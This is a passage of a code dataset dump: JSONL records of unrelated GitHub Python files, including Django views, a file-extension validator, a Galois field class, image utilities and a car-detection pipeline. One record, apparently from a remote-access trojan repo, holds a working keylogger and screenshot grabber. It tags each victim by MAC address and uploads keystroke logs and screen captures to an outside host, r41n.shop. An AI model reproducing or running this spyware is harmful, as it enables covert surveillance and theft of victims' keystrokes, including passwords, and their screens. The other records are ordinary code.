np.round(Y)))\n","repo_name":"mattemoore/DeepLearning","sub_path":"facial_recognition/code/logistic_regression_depracated.py","file_name":"logistic_regression_depracated.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35806327909","text":"import os\n\nfrom django.core.exceptions import ValidationError\n\ndef allow_only_validator(value):\n extention = os.path.splitext(value.name)[1]\n valid_extention = ['.png', '.jpg', '.jpeg']\n\n if not extention.lower() in valid_extention:\n raise ValidationError('Unsupported file extention. 
Allow extentions: ' + str(valid_extention))\n","repo_name":"namuetn/Django-Restaurant","sub_path":"accounts/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2586955826","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport requests\nimport struct, uuid\nfrom pyautogui import *\nfrom datetime import datetime\nfrom pynput.keyboard import Key, Listener\n\ndef get_addr():\n\treturn ''.join([hex(fragment)[2:].zfill(2) for fragment in struct.unpack(\"BBBBBB\", struct.pack(\"!Q\", uuid.getnode())[2:])])\n\ndef win_click(direction, flag, x, y):\n\tx = int(x)\n\ty = int(y)\n\tif flag:\n\t\tclick(x, y, 2, 0, direction)\n\telse:\n\t\tclick(x, y, 1, 0, direction)\n\ndef win_capture():\n\tfile_name = ''\n\turl = 'http://www.r41n.shop/storage.cgi'\n\tscreenshot('./cap.png')\n\twith open('./cap.png', 'rb') as f:\n\t\tfile_name=get_addr()+datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")+'.png'\n\t\tdata = {'upload_file': f, 'file_name': file_name}\n\t\tres = requests.post(url, files=data)\n\tos.remove('./cap.png')\n\tif res.text == 'success\\n':\n\t\treturn False, file_name\n\telse:\n\t\treturn True, None\n\ndef on_press(key):\n\ttry:\n\t\tc = key.char\n\t\twith open('./' + get_addr() + '.txt', 'a') as f:\n\t\t\tf.write(c)\n\texcept:\n\t\tpass\n\ndef on_release(key):\n\tpass\n\ndef get_keyLog():\n\twith open('./' + get_addr() + '.txt', 'r') as f:\n\t\treturn f.read()\n\ndef post_keyLog():\n\turl = 'http://www.r41n.shop/key_logger.cgi'\n\twith open('./' + get_addr() + '.txt', 'rb') as f:\n\t\tdata = {'upload_file': f, 'file_name': get_addr()+'.txt'}\n\t\tres = requests.post(url, files=data)\n\tif res.text == 'success\\n':\n\t\treturn False\n\telse:\n\t\treturn True\n","repo_name":"phoe6/rat","sub_path":"module/win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75082961475","text":"import http.server\nimport socketserver\n\nHOST = \"192.168.1.103\"\nPORT = 80\nDIRECTORY = \"books\"\n\n\nclass Handler(http.server.SimpleHTTPRequestHandler):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, directory=DIRECTORY, **kwargs)\n\n\nwith socketserver.TCPServer((HOST, PORT), Handler) as httpd:\n print(f\"Serving books at {HOST}:{PORT}\")\n httpd.serve_forever()","repo_name":"ivan-gerov/kobo_books_server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19949170707","text":"from django.views.generic import CreateView, ListView, UpdateView, DeleteView\nfrom .models import Language\nfrom django.urls import reverse_lazy\n\n\nclass LanguageCreateView(CreateView):\n model =Language\n template_name = 'language/create.html'\n fields = ('name', )\n success_url =reverse_lazy('Qfxcinema:movie-list')\n\n def get_context_data(self, **kwargs):\n context = super(LanguageCreateView, self).get_context_data(**kwargs)\n context['language'] = 'this is for language'\n return context\n\nclass LanguageListView(ListView):\n\tmodel = Language\n\ttemplate_name = 'language/create.html'\n\tcontext_object_name = 'Languages'\n\n\nclass LanguageUpdateView(UpdateView):\n\tmodel = Language\n\ttemplate_name = 'language/update.html'\n\tfields = '__all__'\n\tsuccess_url = reverse_lazy('Qfxcinema:language-list')\n\n\tdef 
get_context_data(self, **kwargs):\n\t\tcontext = super(LanguageUpdateView, self).get_context_data(**kwargs)\n\t\tcontext['language']= 'this is for update'\n\t\treturn context\n\nclass LanguageDeleteView(DeleteView):\n\tmodel = Language\n\tsuccess_url = reverse_lazy('Qfxcinema:language_list')\n\n\tdef get(self, request, *args, **kwargs):\n\t\tself.post(self, request, *args, **kwargs)","repo_name":"ghanshyamneupane/first-project","sub_path":"Qfxcinema/language_views.py","file_name":"language_views.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36151495323","text":"\"\"\"\nDescription : 해당 폴더에 라벨링 되어있지 않은 모든 이미지 파일을 삭제한다\"\n Labeling : (1.jpg + 1.txt), (2.png + 2.txt)\n No Labeling : (1.jpg), (2.jpg)\nUsage : python delete_no_label_file.py --folder=\"./coco/images/train/\"\n\n\"\"\"\nimport argparse\nimport os\nimport sys\n \ndef file_delete(path):\n files = os.listdir(path)\n img_file_list = []\n\n # 파일의 개수\n print('file count : ', len(files))\n\n # 모든 이미지 파일을 리스트에 넣는다 \n for _file in files:\n name, ext = _file.split('.')\n\n if ext == \"jpg\" or ext == \"jpeg\" or ext == \"png\" or ext == \"gif\":\n img_file_list.append(name)\n # files.remove(_file)\n \n # 리스트에 있는 이미지 파일 중에서 .txt파일도 같이 가지고 있으면 리스트에서 삭제한다\n for _file in files:\n name, ext = _file.split('.')\n\n if ext == \"txt\":\n if name in img_file_list:\n img_file_list.remove(name)\n\n #리스트에 남아 있는 파일 삭제\n for name in img_file_list:\n if os.path.isfile(path+name+\".jpg\"):\n print(name)\n os.remove(path+name+\".jpg\")\n elif os.path.isfile(path+name+\".jpeg\"):\n print(name)\n os.remove(path+name+\".jpeg\")\n elif os.path.isfile(path+name+\".png\"):\n print(name)\n os.remove(path+name+\".png\")\n elif os.path.isfile(path+name+\".gif\"):\n print(name)\n os.remove(path+name+\".gif\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--folder\", type=str,\n help=\"Source Folder\") \n \n args = parser.parse_args()\n file_delete(args.folder)","repo_name":"AhnJG/AI-Project","sub_path":"Object_Detection/YOLO-V3-Train/delete_no_label_file.py","file_name":"delete_no_label_file.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9737871466","text":"from django.views.generic import View\n\nfrom django.http import JsonResponse\n\n# from subs import producter\nfrom sendmail import Mail\n\n\nclass Sub(View):\n def post(self, request, types):\n data = request.POST.get('data', None)\n tatil = '''各位好:\\n本次发布内容为\\n项目 镜像 tag\\n'''\n for i in eval(data):\n print(i.get('tag'))\n print(i.get('image'))\n context = i.get('project') + \" \" + i.get(\"image\") + \" \" + i.get('tag') + \"\\n\"\n tatil += context\n m = Mail(content=tatil)\n if m.send():\n return JsonResponse({\"code\": 0})\n else:\n return JsonResponse({\"code\": 4})\n","repo_name":"x82423990/operation-platform","sub_path":"subs/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9258645404","text":"import math\nimport sys\n\nclass GF:\n\n def __init__(self, prime, poly):\n self.prime = prime\n self.mod_poly = poly\n self.dimension = len(self.mod_poly) - 1\n self.q = int(math.pow(self.prime, self.dimension))\n self.exp_2_pol = []\n self.pol_2_exp = [0]*self.q\n self.pol_2_exp[0] = -1*sys.maxint\n self.zero_exp = 
-1*sys.maxint\n        for i in range(1, self.q):\n            pol = [0]*i\n            pol.pop()\n            pol.append(1)\n            poly = self.divide_poly(pol)\n            ind = 0\n            for j in range(len(poly)):\n                ind += poly[j]*(self.prime**j)\n            self.pol_2_exp[ind] = i - 1\n            self.exp_2_pol.append(poly)\n\n    def divide_poly(self, poly):\n        if len(poly) >= len(self.mod_poly):\n            mul_index = len(poly) - len(self.mod_poly)\n            prod = []\n            for i in range(mul_index):\n                prod.append(0)\n            for i in range(mul_index, len(self.mod_poly) + mul_index):\n                prod.append(\n                    (self.mod_poly[i - mul_index]*poly[-1]) % self.prime)\n            bal = self.sub_poly(poly, prod)\n            return self.divide_poly(bal)\n        else:\n            return poly\n\n    def mul_exp(self, exp1, exp2):\n        if exp1 == self.zero_exp:\n            return exp2\n        elif exp2 == self.zero_exp:\n            return exp1\n        else:\n            return ((exp1 + exp2) % (self.q - 1))\n\n    def pol_2_indx(self, poly):\n        ind = 0\n        for i in range(len(poly)):\n            ind += poly[i]*(self.prime**i)\n        return ind\n\n    def mul_poly(self, poly1, poly2):\n        ind1 = self.pol_2_indx(poly1)\n        ind2 = self.pol_2_indx(poly2)\n        exp1 = self.pol_2_exp[ind1]\n        exp2 = self.pol_2_exp[ind2]\n        return self.exp_2_pol[self.mul_exp(exp1, exp2)]\n\n    def div_poly(self, poly1, poly2):\n        ind0 = 0\n        for i in range(len(poly1)):\n            ind0 += poly1[i]*(self.prime**i)\n        ind1 = 0\n        for i in range(len(poly2)):\n            ind1 += poly2[i]*(self.prime**i)\n        # Map polynomial table indices to exponents before dividing, as mul_poly does.\n        return self.exp_2_pol[self.div_exp(self.pol_2_exp[ind0], self.pol_2_exp[ind1])]\n\n    def div_exp(self, exp1, exp2):\n        inv_exp2 = self.m_inv_exp(exp2)\n        return self.mul_exp(exp1, inv_exp2)\n\n    def m_inv_exp(self, exp):\n        # Multiplicative inverse in the exponent domain of GF(q): (q-1) - (exp mod (q-1)).\n        return (self.q - 1) - (exp % (self.q - 1))\n\n    def add_exp(self, exp1, exp2):\n        if exp1 == -1*sys.maxint:\n            pol1 = []\n        else:\n            pol1 = self.exp_2_pol[exp1]\n        if exp2 == -1*sys.maxint:\n            pol2 = []\n        else:\n            pol2 = self.exp_2_pol[exp2]\n        _sum = self.add_poly(pol1, pol2)\n        ind = self.pol_2_indx(_sum)\n        return self.pol_2_exp[ind]\n\n    def sub_poly(self, poly1, poly2):\n        inv_poly2 = self.a_inv_poly(poly2)\n        return self.add_poly(poly1, inv_poly2)\n\n    def add_poly(self, poly1, poly2):\n        if len(poly1) >= len(poly2):\n            _sum = []\n            for i in range(len(poly2)):\n                _sum.append((poly1[i] + poly2[i]) % self.prime)\n            for i in range(len(poly2), len(poly1)):\n                _sum.append(poly1[i])\n            if len(_sum) == 0:\n                return _sum\n            while(_sum[-1] == 0):\n                _sum.pop()\n                if len(_sum) == 0:\n                    break\n            return _sum\n        else:\n            return self.add_poly(poly2, poly1)\n\n    def a_inv_poly(self, poly):\n        inv = []\n        for i in range(len(poly)):\n            inv.append((self.prime - poly[i]) % self.prime)\n        return inv\n\n    def a_inv_exp(self, exp):\n        poly = self.exp_2_pol[exp]\n        inv = self.a_inv_poly(poly)\n        ind = self.pol_2_indx(inv)\n        return self.pol_2_exp[ind]\n\n    def rs_gen_poly(self, rho):\n        gen_poly = [self.a_inv_exp(1), 0]\n        comp = 1\n        while comp < rho - 2:\n            gen_poly = self.rs_gen_add_degree(gen_poly)\n            comp += 1\n        return gen_poly\n\n    def rs_gen_add_degree(self, pol):\n        new_degree = len(pol)\n        new_gen = []\n        g_0 = self.mul_exp(self.a_inv_exp(new_degree), pol[0])\n        new_gen.append(g_0)\n        new_comp = self.a_inv_exp(new_degree)\n        for i in range(1, new_degree):\n            _prdct = self.mul_exp(pol[i], new_comp)\n            _sum = self.add_exp(_prdct, pol[i-1])\n            new_gen.append(_sum)\n        new_gen.append(0)\n        return new_gen\n","repo_name":"manuts/gr-ldpc","sub_path":"apps/gf.py","file_name":"gf.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"72303268354","text":"import cv2,numpy as np\nimport files\n\nclass Pipeline(object):\n    def __init__(self,transforms):\n        
self.transforms=transforms\n\n def __call__(self,frame_i):\n frame_i=self.transforms[0](frame_i)\n for transform_j in self.transforms[1:]:\n frame_i=transform_j(frame_i)\n return frame_i\n\ndef transform(in_path,out_path,frame_fun,single_frame=False):\n if(type(frame_fun)==list):\n frame_fun=Pipeline(frame_fun)\n files.make_dir(out_path)\n print(in_path)\n for in_i in files.top_files(in_path):\n out_i=out_path+'/'+in_i.split('/')[-1]\n print(out_i)\n frames=read_frames(in_i)\n if(single_frame):\n new_frames=[frame_fun(frame_j) for frame_j in frames]\n else:\n new_frames=frame_fun(frames)\n save_frames(out_i,new_frames)\n\ndef seq_tranform(frame_fun,img_seqs):\n return { name_i:[frame_fun(frame_j) for frame_j in seq_i]\n for name_i,seq_i in img_seqs.items()}\n\ndef read_seqs(in_path):\n seqs={}\n for seq_path_i in files.top_files(in_path):\n frames=read_frames(seq_path_i)\n name_i=seq_path_i.split('/')[-1]\n print(name_i)\n seqs[name_i]=frames\n return seqs \n\ndef save_seqs(seq_dict,out_path):\n files.make_dir(out_path)\n for name_i,seq_i in seq_dict.items():\n seq_path_i=out_path+'/'+name_i\n save_frames(seq_path_i,seq_i)\n\ndef read_frames(seq_path_i):\n if(seq_path_i.split(\".\")[-1]==\"npy\"):\n return np.load(seq_path_i)\n return [ cv2.imread(frame_path_j, cv2.IMREAD_GRAYSCALE)\n for frame_path_j in files.top_files(seq_path_i)]\n\ndef save_frames(seq_path_i,seq_i):\n files.make_dir(seq_path_i)\n for j,frame_j in enumerate(seq_i): \n frame_name_j=seq_path_i+'/'+str(j)+\".png\"\n cv2.imwrite(frame_name_j,frame_j)\n\ndef concat(in_path1,in_path2,out_path):\n seq1,seq2=read_seqs(in_path1),read_seqs(in_path2)\n names=seq1.keys()\n concat_seqs={}\n for name_i in names:\n seq1_i,seq2_i=seq1[name_i],seq2[name_i]\n seq_len=min(len(seq1_i),len(seq2_i))\n seq1_i,seq2_i= seq1_i[:seq_len],seq2_i[:seq_len]\n new_seq_i=np.concatenate( [seq1_i,seq2_i],axis=1)\n concat_seqs[name_i]=new_seq_i\n save_seqs(concat_seqs,out_path)","repo_name":"tjacek/res_ensemble","sub_path":"imgs.py","file_name":"imgs.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23968843089","text":"import json\nfrom decimal import Decimal\n\nimport requests\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.utils import timezone\nfrom rest_framework.exceptions import PermissionDenied, APIException\n\nfrom ducatus_voucher.vouchers.models import Voucher\nfrom ducatus_voucher.transfers.models import Transfer\nfrom ducatus_voucher.litecoin_rpc import DucatuscoreInterface, DucatuscoreInterfaceException\nfrom ducatus_voucher.consts import DECIMALS\nfrom ducatus_voucher.settings import RATES_API_URL\n\n\ndef validate_voucher(activation_code):\n try:\n voucher = Voucher.objects.get(activation_code=activation_code)\n except ObjectDoesNotExist:\n raise PermissionDenied(detail='Invalid activation code')\n\n if not voucher.is_active:\n raise PermissionDenied(detail='This voucher is not active')\n\n if voucher.is_used:\n raise PermissionDenied(detail='This voucher already used')\n\n return voucher\n\n\ndef make_voucher_transfer(voucher, duc_address):\n duc_amount = convert_usd2duc(usd_amount=voucher.usd_amount)\n transfer = Transfer(voucher=voucher, duc_amount=duc_amount, duc_address=duc_address)\n transfer.save()\n\n try:\n rpc = DucatuscoreInterface()\n tx_hash = rpc.node_transfer(duc_address, duc_amount)\n transfer.tx_hash = tx_hash\n transfer.transfer_status = 'WAITING_FOR_CONFIRM'\n transfer.save()\n print(f'VOUCHER 
ACTIVATION: successful transfer {transfer.tx_hash} to {transfer.duc_address} '\n f'for {transfer.duc_amount} DUC', flush=True)\n except DucatuscoreInterfaceException as err:\n transfer.transfer_status = 'ERROR'\n transfer.save()\n print(f'VOUCHER ACTIVATION: failed transfer {transfer.duc_amount} DUC to {transfer.duc_address} '\n f'with exception {str(err)}', flush=True)\n raise APIException(detail=str(err))\n\n voucher.is_used = True\n voucher.activation_date = timezone.now()\n voucher.save()\n\n return transfer\n\n\ndef send_dividends(duc_address, duc_amount):\n transfer = Transfer(duc_amount=duc_amount, duc_address=duc_address)\n transfer.save()\n\n try:\n rpc = DucatuscoreInterface()\n tx_hash = rpc.node_transfer(duc_address, duc_amount)\n except DucatuscoreInterfaceException as err:\n transfer.transfer_status = 'ERROR'\n transfer.save()\n raise APIException(detail=str(err))\n\n transfer.tx_hash = tx_hash\n transfer.transfer_status = 'WAITING_FOR_CONFIRM'\n transfer.tag = 'dividends'\n transfer.save()\n\n return transfer\n\n\ndef confirm_transfer(message):\n tx_hash = message.get('txHash')\n transfer = Transfer.objects.get(tx_hash=tx_hash)\n transfer.transfer_status = 'CONFIRMED'\n transfer.save()\n\n if transfer.voucher.payment_id or transfer.voucher.charge_id:\n transfer.voucher.register_in_lottery(transfer)\n\n\ndef convert_usd2duc(usd_amount):\n duc_usd_rate = json.loads(requests.get(RATES_API_URL.format(fsym='DUC', tsyms='USD')).content).get('USD')\n duc_amount = Decimal(str(usd_amount / duc_usd_rate)) * DECIMALS['DUC']\n return duc_amount\n","repo_name":"DucatusX/ducatus_voucher_backend","sub_path":"ducatus_voucher/transfers/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38753992371","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"All *basic* python related details\"\nimport itertools\nimport subprocess\nfrom pathlib import Path\nfrom waflib.Configure import conf\nfrom waflib.Context import Context\nfrom ._requirements import REQ as requirements\nfrom ._utils import copyfiles\n\n@requirements.addcheck\ndef check_julia(cnf, name, version):\n \"checks pylint's astroid version\"\n requirements.programversion(cnf, 'julia', version, reg = name)\n\nclass JuliaLint:\n \"\"\"\n Sets up a server for linting julia files\n \"\"\"\n def __init__(self, fname = str(Path(__file__).parent/\"_julialint.jl\")):\n self.cnt = itertools.count()\n self.file = fname\n self.server = None\n\n def lint(self, bld, src = None):\n \"runs the lint on the file\"\n if src is None:\n src = bld.path.ant_glob('**/*.jl')\n\n if len(src) == 0:\n return\n\n if self.server is None:\n self.server = subprocess.Popen([\"julia\", self.file],\n stdout = subprocess.DEVNULL,\n stderr = subprocess.DEVNULL)\n for inp in src:\n grp = f'julia_{next(self.cnt)}'\n bld.add_group(grp, move = False)\n bld(source = [inp],\n color = 'BLUE',\n rule = f'julia {self.file} ${{SRC}}',\n group = grp,\n cls_keyword = lambda _: 'Julia')\n\nJLINT = JuliaLint()\n\n@conf\ndef build_julia(bld:Context, name:str, _:str, **_2):\n \"builds a python module\"\n if 'julia' not in requirements:\n return\n\n copyfiles(bld, name, bld.path.ant_glob(\"**/*.jl\"))\n #JLINT.lint(bld)\n","repo_name":"depixusgenome/wafbuilder","sub_path":"_julia.py","file_name":"_julia.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
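
The Ducatus transfer record above computes usd_amount / duc_usd_rate in float before wrapping the quotient in Decimal, so binary rounding error can leak into an on-chain amount. Below is a minimal sketch of the same conversion done entirely in Decimal; the RATES_API_URL shape and the DECIMALS map are assumptions modeled on that record, and the final quantize step is an added choice, not the project's code:

import json
from decimal import Decimal, ROUND_DOWN

import requests

# Hypothetical stand-ins for the constants the record imports from its settings/consts modules.
RATES_API_URL = 'https://rates.example/price?fsym={fsym}&tsyms={tsyms}'
DECIMALS = {'DUC': Decimal(10) ** 8}

def convert_usd2duc(usd_amount):
    payload = json.loads(requests.get(RATES_API_URL.format(fsym='DUC', tsyms='USD')).content)
    # Parse the quoted rate into Decimal before any arithmetic touches it.
    duc_usd_rate = Decimal(str(payload['USD']))
    duc_amount = Decimal(str(usd_amount)) / duc_usd_rate * DECIMALS['DUC']
    # Round down to a whole base unit so the node is never asked for a fractional amount.
    return duc_amount.quantize(Decimal(1), rounding=ROUND_DOWN)
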
+{"seq_id":"40337312924","text":"from dexy.exceptions import InternalDexyProblem\nfrom dexy.exceptions import UserFeedback\nfrom dexy.filters.process import SubprocessExtToFormatFilter\nimport os\n\nclass Asciidoctor(SubprocessExtToFormatFilter):\n \"\"\"\n Runs `asciidoctor`.\n \"\"\"\n aliases = ['asciidoctor']\n _settings = {\n 'tags' : ['asciidoc', 'html'],\n 'examples' : ['asciidoctor'],\n 'output' : True,\n 'version-command' : \"asciidoctor --version\",\n 'executable' : 'asciidoctor',\n 'input-extensions' : ['.*'],\n 'output-extensions': ['.html', '.xml', '.tex'],\n 'stylesheet' : (\"Custom asciidoctor stylesheet to use.\", None),\n 'format-specifier': '-b ',\n 'backend' : (\"Asciidoctor backend to use (optional, only to override default).\", None),\n 'ext-to-format' : {\n '.html' : 'html5',\n '.xml': 'docbook5',\n '.tex' : 'latex'\n },\n 'command-string': '%(prog)s %(format)s %(args)s %(ss)s -o %(output_file)s %(script_file)s'\n }\n\n def command_string_args(self):\n args = super(Asciidoctor, self).command_string_args()\n\n stylesheet = self.setting('stylesheet')\n if stylesheet is not None:\n stylesdir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'asciidoctor'))\n\n if not os.path.exists(stylesdir):\n msg = \"Asciidoctor stylesheet directory not found at '%s'\"\n raise InternalDexyProblem(msg % stylesdir)\n\n args['ss'] = \"-a stylesheet=%s -a stylesdir=%s\" % (stylesheet, stylesdir)\n\n if not os.path.exists(os.path.join(stylesdir, stylesheet)):\n msg = \"No stylesheet file named '%s' was found in directory '%s'. Files found: %s\"\n stylesheets = os.listdir(stylesdir)\n raise UserFeedback(msg % (stylesheet, stylesdir, \", \".join(stylesheets)))\n\n else:\n args['ss'] = ''\n\n backend = self.setting('backend')\n if backend is not None:\n format_specifier = self.setting('format-specifier')\n args['format'] = \"%s%s\" % (format_specifier, backend)\n\n return args\n","repo_name":"dexy/dexy","sub_path":"dexy/filters/asciidoctor.py","file_name":"asciidoctor.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":308,"dataset":"github-code","pt":"61"} +{"seq_id":"27001468323","text":"import cv2\nimport random\n\nimg = cv2.imread('Tutorials/Assets/image.jpeg')\n\n# when an image is loaded it imports the pixels and imputs them into a numpy array\n# the term shape tells me the number of rows, number of columns, and the number of channels (colour space BGR)\nprint(img.shape)\n\n# accessing pixel values\n# this indexes the first row then the pixels from the 45th to 100th place in the first row\nprint(img[0][45:100])\n\nprint(img[0][100]) # looks at the first row 100th place\n\n\n# modifying an image\n# the code below works via the first loop picking the 1st row then goes through all the coloums and assigns random BGR values\nfor i in range(int(img.shape[0]/4)): # loops from 0 to 100\n for j in range(img.shape[1]): # here we are looking at the columns (width)\n img[i][j] = [random.randint(0, 255), random.randint(\n 0, 255), random.randint(0, 255)] # 3 random values for BGR\ncv2.imshow('Image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"thefluffyorange/OpenCV","sub_path":"Tutorials/Tutorial_02.py","file_name":"Tutorial_02.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72199598595","text":"#!/usr/bin/env python\n\nimport scrollphathd\n\nimport threading\nimport logging\n\n\n\nPREFIX_OFFSET = 
1\nSCROLL_PAGE_SIZE = 3\nROTATED = 180\nALL_UPPERCASE = False\nINITIAL_DELAY = 3.0\nPOST_DELAY = 1.0\n\nclass AutoScroll():\n _is_enabled = False\n _interval = 0.05\n _items = []\n _current = None\n _currentIndexCountdown = 0\n _overflow_length = 0\n\n def AutoScroll(self, interval=0.05):\n self._interval = interval\n\n def startstop(self):\n if self._is_enabled is False:\n logging.info(\"Starting Autoscroll\")\n self._is_enabled = True\n # if ROTATED != 0:\n logging.info(\"Autoscroll rotated {}\".format(ROTATED))\n scrollphathd.rotate(degrees=ROTATED)\n self.run()\n else:\n self._is_enabled = False\n\n def append(self, msg):\n logging.info(\"Autoscroll append\")\n self._items.insert(0, msg + (\" \" * 3))\n \n def clear(self):\n self._items.clear()\n\n def run(self):\n if self._is_enabled is False:\n return\n \n next_interval = self._interval\n\n if self._currentIndexCountdown < 0:\n\n if len(self._items) > 0:\n upcoming = self._items.pop()\n if ALL_UPPERCASE:\n upcoming = upcoming.upper()\n\n scrollphathd.clear()\n scrollphathd.write_string(upcoming, x=PREFIX_OFFSET, y=0, font=None, letter_spacing=1, brightness=0.2, monospaced=False, fill_background=False)\n scrollphathd.show()\n\n shape = scrollphathd.get_shape()\n buffer_shape = scrollphathd.get_buffer_shape()\n self._overflow_length = buffer_shape[0] - shape[0]\n logging.info(\"Autoscroll.run: Decreasing index countdown: {} ({} - {})\".format(str(self._overflow_length), shape[0], buffer_shape[0]))\n self._currentIndexCountdown = self._overflow_length\n\n next_interval = INITIAL_DELAY # inital delay\n else:\n logging.info(\"Autoscroll.run: No items to pop..\")\n # self.demo()\n \n else:\n logging.info(\"Autoscroll.run: Just scrolling..\")\n\n # Scroll the buffer content\n scrollphathd.scroll(x=SCROLL_PAGE_SIZE)\n # Show the buffer\n scrollphathd.show()\n\n self._currentIndexCountdown -= SCROLL_PAGE_SIZE\n\n # Start a timer\n threading.Timer(next_interval, self.run).start()\n\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n\n scrollphathd.set_clear_on_exit(True)\n autoscroll = AutoScroll()\n autoscroll.startstop()\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ingvirafn/raspberrypi-scroller","sub_path":"autoscroller.py","file_name":"autoscroller.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7991284059","text":"\"\"\"\nАрифметическая прогрессия\nЧисло m , чтобы получилась сумма k + (k+1) .... + (k+m-1) = n\n\"\"\"\n\ndef leftbinsearch(left, right, checkfunc, params):\n while left < right:\n mid = (left + right) // 2\n if checkfunc(mid, params):\n right = mid\n else:\n left = mid + 1\n return left\n\ndef checkcount(days, params):\n n, k = params\n return (2 * k + days - 1) * days // 2 >= n\n\nnodays = leftbinsearch(0, 200, checkcount, (200, 10))\nprint(nodays)\n","repo_name":"ivangotovets/algorithms","sub_path":"_Бинарный поиск/6-сумма арифм прогрессии.py","file_name":"6-сумма арифм прогрессии.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72170339075","text":"from utils import *\nimport classifier\nfrom sklearn.externals import joblib\nfrom datetime import datetime\nfrom cars import Cars\nfrom skimage.io import imsave\nfrom scipy import misc\nfrom moviepy.editor import ImageSequenceClip\n\n\ndef pipeline(image, cars, model, frame_num, heat_map='n'):\n \"\"\"\n Take video frame as input. 
Implements sliding window search for cars, draws\n    bounding boxes on the frame and returns the new frame.\n\n    import glob\n    import matplotlib.image as mpimg\n    import matplotlib.pyplot as plt\n    sample_images = glob.glob('./data/test_images/*.jpg',recursive=True)\n    image = mpimg.imread(sample_images[0])\n    cars = Cars()\n    frame_num = 0\n    pipeline(image, cars, model, 0, heat_map='y')\n\n    :param image: Frame capture of the video\n    :param cars: Cars Object to track location of cars from frame to frame\n    :return: Frame with bounded boxes\n    \"\"\"\n\n    boxes = get_boxes() # Generate box coordinates for sliding window search\n    locations = [] # list to track locations of cars\n    car_num = 0\n    count = 0\n    for box in reversed(boxes):\n        section = image[box[1]:box[3],box[0]:box[2],:]\n        section = misc.imresize(section, (64, 64, 3))\n        features = classifier.extract_features([section])\n        #print(np.mean(features),np.std(features),np.max(features),np.min(features))\n        is_car = model.predict(features)\n\n        if is_car:\n            locations.append(box)\n            car_num += 1\n        count += 1\n\n        #if count > 15:\n        #    break\n    print(\"Cars: \", car_num, \"No cars:\",count-car_num)\n    current_data = cars.add_locations(frame_num, locations)\n    image = draw_boxes_info(image, current_data)\n\n    if heat_map == 'y':\n        heat_map = current_data[\"heat_map\"]\n        image_with_heatmap = draw_heat_map(image, heat_map)\n        return image, heat_map, image_with_heatmap\n\n\n    timestamp = str(\n        datetime.now().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3])\n    imsave((output_images_folder_heatmaps + \"frame-{0}-{1}.jpg\").format(timestamp, frame_num),\n           current_data[\"heat_map\"])\n    return image\n\nif __name__ == \"__main__\":\n    project_video_output = './data/videos/project_video_output.mp4'\n    project_video = \"./data/videos/project_video.mp4\"\n    output_images_folder = \"./data/videos/output_images/\"\n    output_images_folder_heatmaps = \"./data/videos/heatmaps/\"\n\n    vidcap = cv2.VideoCapture(project_video)\n    success, image = vidcap.read()\n    frame_num = 1\n    cars = Cars() # create the car object\n    model = joblib.load('./models/grid-0.965-1.pkl') # load trained linear SVC from a .pkl file\n\n    clean_output_folder(output_images_folder_heatmaps)\n    clean_output_folder(output_images_folder) # deleted previous transformed images stored in the output folder\n\n    while frame_num < 250:\n        #print('Frame Number: ', frame_num) # Print out frame number\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)/255\n\n        # Call to main pipeline\n        image = pipeline(image, cars, model, frame_num)\n\n        timestamp = str(\n            datetime.now().strftime('%Y_%m_%d_%H_%M_%S_%f')[:-3]) # save with timestamp and frame number as file name\n\n        imsave((output_images_folder + \"frame-{0}-{1}.jpg\").format(timestamp, frame_num), image) # save frame as a JPEG file\n        frame_num += 1 # Track frame number\n\n        success, image = vidcap.read()\n\n    # Read all written images and save as a video\n    write_video(project_video_output, 